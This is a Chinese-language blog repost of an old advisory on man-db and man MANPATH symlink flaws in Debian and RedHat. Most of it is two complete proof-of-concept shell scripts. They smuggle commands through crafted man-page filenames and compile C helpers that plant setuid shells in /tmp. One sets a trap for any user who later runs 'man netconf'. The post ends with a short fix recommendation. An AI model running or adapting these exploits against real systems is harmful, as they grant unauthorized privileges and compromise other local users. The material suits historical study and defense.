Chinaunix首页 | 论坛 | 博客
  • 博客访问: 845473
  • 博文数量: 756
  • 博客积分: 40000
  • 博客等级: 大将
  • 技术积分: 4980
  • 用 户 组: 普通用户
  • 注册时间: 2008-10-13 14:40
文章分类

全部博文(756)

文章存档

2011年(1)

2008年(755)

我的朋友

分类:

2008-10-13 14:41:56

涉及程序:
man-db
   
描述:
本地用户利用 man 漏洞取得系统特权
   
详细:
近日发现 LINUX 的 man 软件包存在漏洞,在某些情况下,MAN 允许用户自定义 MAN 寻找 MAN 帮助页的路径,但 MAN 根据用户提供的路径打开了帮助页后,却没有丢掉其特权,这可能导致:

1、在 debian's man-db (<= 2.3.17-3.2, 2.3.16-3) 系统上,用户能得到 'man' 的 setuid shell
2、在 RedHat's man (<= man-1.5h1-20) 系统上,用户能执行任意代码,包括得到 root 的 shell


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


#!/bin/sh
###################################################
# Fri Jun 1 23:00:10 JAVT 2001             #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs        #
# proof of concept.                     #
# version affected:                     #
#  <= man-db 2.3.16-3,2.3.17-3.2           #
#                                 #
# tested on:                         #
# debian2.2 -> instant man suidshell         #
#                                 #
# by jenggo                #
#                                 #
# thanx to: echo, mayonaise all @ #karet       #
# ==> Mr.dur,amien,mega,akbar ... damai,damai ;) #
###################################################

TMPDIR=/tmp/mywork

RAND=`/bin/date +%S`
echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man

echo "copying needed files ..."
if [ ! -x /usr/bin/groff ]  [ ! -x /usr/bin/grotty ]  [ ! -x /usr/bin/troff ]  [ ! -x /usr/bin/gcc ]; then
echo "Failed, I need executable : groff,grotty,troff,gcc"
echo "cleaning up ..."
/bin/rm -rf $TMPDIR
fi

/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR

echo "compiling helper ..."
/bin/cat > $TMPDIR/hehe.c <#include

int main()
{
char *aa[2]={"/bin/sh", NULL};
   
setreuid(6,6);
execve(aa[0], aa, NULL);
exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null

/bin/cat > $TMPDIR/mandeb.c <#include

int main()
{
seteuid(6);
setuid(6);
system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
system("/bin/chown man /tmp/huhu");
system("/bin/chmod 4755 /tmp/huhu");
exit(0);
}
EOF

/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null

echo "making our manpage ..."
/bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1
/bin/echo "bebas euy"/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz"
/bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls"
export PATH=$TMPDIR
/usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null

echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1
export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin

echo "exploiting ..."
/bin/rm -f /tmp/huhu
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork

echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp

if [ -u /tmp/huhu ]; then
echo "file /tmp/huhu is setuid. Hope it's owned by man"
echo "Have a nice day"
echo "[----- jenggo -----]"
/tmp/huhu
else
echo "exploit failed, cleaning up our binary ..."
fi

echo "cleaning up our preparation step dir ..."
/bin/rm -rf /tmp/$TMPDIR



#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001             #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs        #
# proof of concept.                     #
# version affected:                     #
#  <= man-1.5h1-20                     #
#                                 #
# tested on:                         #
# redhat7.1 -> any user suidshell           #
#                                 #
# by jenggo                #
#                                 #
# thanx to: echo, mayonaise all @ #karet       #
###################################################
# hmmm ... ada yang bisa modif jadi instant root ??

# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"

# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"

GZ="/bin/gzip"

echo -n "check man dir ..."

if [ ! -d $CACHEDIR ]; then
if [ -d $CACHEDIR2 ]; then
   CACHEDIR=$CACHEDIR2
   echo "OK"
else
   echo "FAILED"
   echo "check your man dir"
   exit
fi
else
echo "OK"
fi

echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
# is it a debian man?
if [ -d /usr/lib/man-db ]; then
   echo "FAILED"
   echo "I think this is debian style man, use other script"
else
   echo "FAILED"
   echo "can't find executables sgid man binary"
fi
exit
else
echo "OK"
fi

echo "making our man directory ..."
echo

mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine

echo "creating our man page ..."
echo

echo "BEBAS EUY"$GZ -c > /tmp/man/man1/huhuy.1.gz

echo "creating symlink ..."
echo

ln -s "$CACHEDIR/cat1/netconf.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz

echo "creating our bogus command ..."
echo
touch /tmp/huhuy

echo "making manx shellscript"
echo

/bin/cat > /tmp/mine/manx <#!/bin/sh

export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`

/bin/cat >/tmp/mine/my"\$VICTIM".c <#include
void main()
{
char *hh[2]={"/bin/sh", NULL};
setreuid(\$VICTIM,\$VICTIM);
execve(hh[0], hh, NULL);
}
EOG

/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null

chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null

EOF

chmod 755 /tmp/mine/manx

if [ ! -x /tmp/mine/manx ]; then
echo "file: /tmp/mine/manx can't be set executable !"
echo "fix the exploit first"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
exit
fi

echo "prepare to exploit ..."
echo

export PATH=../../../../../../tmp
cd /

echo "exploiting ..."
echo

/usr/bin/man -d huhuy 2>/dev/null

export PATH=/bin:/usr/bin

echo "checking our exploit result"
echo

if [ -f "/var/cache/man/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
echo "content of $CACHEDIR/cat1:"
ls -l $CACHEDIR/cat1
echo
echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
echo "and your suidshells will be waiting at /tmp/mine/* "
echo "bye."
echo "[-------- jenggo --------]"
echo
else
echo "hrrmm ... exploit failed to create offending file !"
echo "check again please"
echo "cleaning up ..."
/bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi

   
解决方案:
建议用户采用 man-db 2.3.18-6 和 2.3.16-4
      
--------------------next---------------------

阅读(372) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~